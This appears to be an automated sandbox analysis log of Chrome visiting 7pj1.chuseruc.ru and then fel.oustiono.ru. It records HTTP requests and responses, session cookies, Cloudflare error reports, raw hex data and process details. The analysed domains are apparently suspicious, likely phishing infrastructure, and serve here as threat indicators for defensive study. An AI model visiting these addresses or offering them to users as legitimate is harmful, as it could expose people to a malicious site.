                  Data Ascii: oO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oO++oO+
                  2025-02-19 18:23:06 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b
                  Data Ascii: O++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.1649714104.21.43.764434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:06 UTC1316OUTGET /favicon.ico HTTP/1.1
                  Host: 7pj1.chuseruc.ru
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: image
                  Referer: https://7pj1.chuseruc.ru/Idsj/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  Cookie: XSRF-TOKEN=eyJpdiI6ImR0Qk9QUi9La1FBbUFCNmxjMlhpS0E9PSIsInZhbHVlIjoiMlVGdmYwOGVrZlhCbXc2NDhyMFZlRW82Q2lFNC9PNStEYkxxVlJXTEhNb1Q1TThxM0o5OFJUWUhJSngzbWs4djlIcGJ5T2FOTS9kWXZIMTJwRitSZlNtYUFNTWkrS0JnTmpoNnR3UkdlUkNOenVjL09qdFI1MFgvUWd0aTJ5YUUiLCJtYWMiOiI5MmQ4ZGNmZjY0NzdlZWFkYTFhOWFmZjBmOGE5MTM5ZTdiNjNhOTY4MDcyNjcxNGU2ODAxMzhjNGU5ODg5N2JjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImRadG5oNFBlWTlPK29weGVCY0tSdHc9PSIsInZhbHVlIjoiN0U3WmFWcGpBaVAxOThFdDhCS29HQk1qWERwYnVhNTNiT09LM2xCOTF2Qmw1MWkvT1FzTGxZTlNPdlNzaEVwRlFKeFR0dk1adFpMbzcybTBrK2o5OXpvZnR5TUVjSjJLcEdnUmFZcU5uRXNGeDdIUklLS1NTU3VyNEVrTlJjdUwiLCJtYWMiOiJjMWIzMDc3ODhlYjg3Nzc1YzY4Y2FiYjQwNGE2Y2RjNDMxN2IyNjUzYWZhMjExN2FiZDFiZmEzNjJkNmMzMTFlIiwidGFnIjoiIn0%3D
                  2025-02-19 18:23:07 UTC1075INHTTP/1.1 404 Not Found
                  Date: Wed, 19 Feb 2025 18:23:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: max-age=14400
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Vary: Accept-Encoding
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=4922&min_rtt=4553&rtt_var=150&sent=171&recv=69&lost=0&retrans=0&sent_bytes=197826&recv_bytes=4112&delivery_rate=7360531&cwnd=228&unsent_bytes=0&cid=c1174ac0c1124e91&ts=375652&x=0"
                  CF-Cache-Status: EXPIRED
                  Server: cloudflare
                  CF-RAY: 91484944fdc1189d-EWR
                  server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1495&rtt_var=563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1894&delivery_rate=1941489&cwnd=181&unsent_bytes=0&cid=0696202ba3935de7&ts=1595&x=0"
                  2025-02-19 18:23:07 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.164971535.190.80.14434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:08 UTC541OUTOPTIONS /report/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3D HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://7pj1.chuseruc.ru
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2025-02-19 18:23:08 UTC336INHTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: OPTIONS, POST
                  access-control-allow-origin: *
                  access-control-allow-headers: content-type, content-length
                  date: Wed, 19 Feb 2025 18:23:07 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.164971635.190.80.14434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:08 UTC482OUTPOST /report/v4?s=e%2F9tidFol7ErcgQ1C%2FVWs4BWHp0Y8v3AaBs3X2%2BIqsTaM4OV2OfPKK3fPTVw3%2BxTIKFPSfcyURcOX83jXCRnt6jt9LWS14Rtts90A8KS%2FvXA%2BfrULU8HCLArZJhvKQ%3D%3D HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 426
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2025-02-19 18:23:08 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 37 70 6a 31 2e 63 68 75 73 65 72 75 63 2e 72 75 2f 49 64 73 6a 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 33 2e 37 36 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                  Data Ascii: [{"age":0,"body":{"elapsed_time":617,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://7pj1.chuseruc.ru/Idsj/","sampling_fraction":1.0,"server_ip":"104.21.43.76","status_code":404,"type":"http.error"},"type":"network-error","u
                  2025-02-19 18:23:08 UTC168INHTTP/1.1 200 OK
                  Content-Length: 0
                  date: Wed, 19 Feb 2025 18:23:08 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.1655121172.67.178.1764434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:15 UTC557OUTGET /loray!cb32fi HTTP/1.1
                  Host: fel.oustiono.ru
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: */*
                  Origin: https://7pj1.chuseruc.ru
                  Sec-Fetch-Site: cross-site
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Referer: https://7pj1.chuseruc.ru/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2025-02-19 18:23:15 UTC825INHTTP/1.1 200 OK
                  Date: Wed, 19 Feb 2025 18:23:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mA2G830w%2Bk%2B6c1QTZMAJvK9kSPptrgWQm3dShdfDWoVD4aLdzltkDbdApm32qjZTOIw3mnM0aGFSNsXn8efvp%2B4gJACEwm5cim%2BvzHb%2B9eVTGLrKH1lrNmI8H%2B2U8aXa69Y%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 91484977bfaf2009-IAD
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=7794&min_rtt=6635&rtt_var=4807&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1135&delivery_rate=183520&cwnd=32&unsent_bytes=0&cid=2265db01cc5376f2&ts=651&x=0"
                  2025-02-19 18:23:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2025-02-19 18:23:15 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.1655132104.21.31.1704434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:16 UTC351OUTGET /loray!cb32fi HTTP/1.1
                  Host: fel.oustiono.ru
                  Connection: keep-alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: */*
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2025-02-19 18:23:16 UTC822INHTTP/1.1 200 OK
                  Date: Wed, 19 Feb 2025 18:23:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1zp3gWoTClb39J3NGYc%2BwOh7VEt3Du0mG9ZlMBmUkSXkveqPR19S30yDJ6nLNr9qg%2Fbb2%2BDct7pvPkhTd%2BCO5TaZAnp55ifihZVUl1ko21Kpw6K4AGrMWAlt0KRWyywjj5k%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 9148497edc3d0c96-EWR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=8048&min_rtt=1532&rtt_var=4581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=929&delivery_rate=1906005&cwnd=157&unsent_bytes=0&cid=cdd7964ea080fe5b&ts=592&x=0"
                  2025-02-19 18:23:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2025-02-19 18:23:16 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:13:23:02
                  Start date:19/02/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                  Imagebase:0x7ff7f9810000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:2
                  Start time:13:23:02
                  Start date:19/02/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1932,i,17079226105512142443,7018941396659437962,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Imagebase:0x7ff7f9810000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:6
                  Start time:13:23:04
                  Start date:19/02/2025
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://7pj1.chuseruc.ru/Idsj/"
                  Imagebase:0x7ff7f9810000
                  File size:3'242'272 bytes
                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Disassembly

                  No disassembly